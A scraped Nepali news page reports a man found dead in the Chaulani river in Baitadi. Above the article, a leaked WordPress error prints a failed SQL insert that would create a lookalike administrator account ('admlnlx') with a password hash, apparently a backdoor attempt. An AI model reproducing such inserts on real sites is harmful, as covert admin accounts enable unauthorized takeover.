WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9CeKK7Rz90P5fNvBXy3XA84ZgWY46.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 06:59:08', '', 'admlnlx', 'admlnlx')

बैतडीमा युवक मृत फेला – Gaule Khabar

बैतडीमा युवक मृत फेला

बैतडीमा युवक मृत फेला
सामाजिक सञ्जाल

बैतडि । चौलानी नदीमा आज एक युवक मृत फेला परेका छन् । मृत फेला पर्नेमा दार्चुलाको लेकम गाउँपालिका–१ सेजालीका ३५ वर्षीय रमेश कार्की रहेका छन् ।

कार्की बैतडीको दोगडाकेदार गाउँपालिका–६ स्थित चौलानी नदीको बीच भङ्गालोमा मृत फेला परेका गोकुलेश्वर प्रहरी चौकीका इन्चार्ज नरेन्द्र धामीले जानकारी दिए । “रमेशको कसरी मृत्यु भयो भन्ने यकिन हुनसकेको छैन”, उहाँले भने, “नदीले बगाएर ल्याएको जस्तो देखिन्छ, थप अनुसन्धान हुँदैछ ।”

गत शुक्रबार शिवरात्रि मेला हेर्न गोकुलेश्वर गएका कार्की घर नफर्केपछि खोजतलास गर्दै जाँदा चौलानीमा मृत भेटिएका हुन् । घटनाको थप अनुसन्धान भइरहेको प्रहरीले जनाएको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका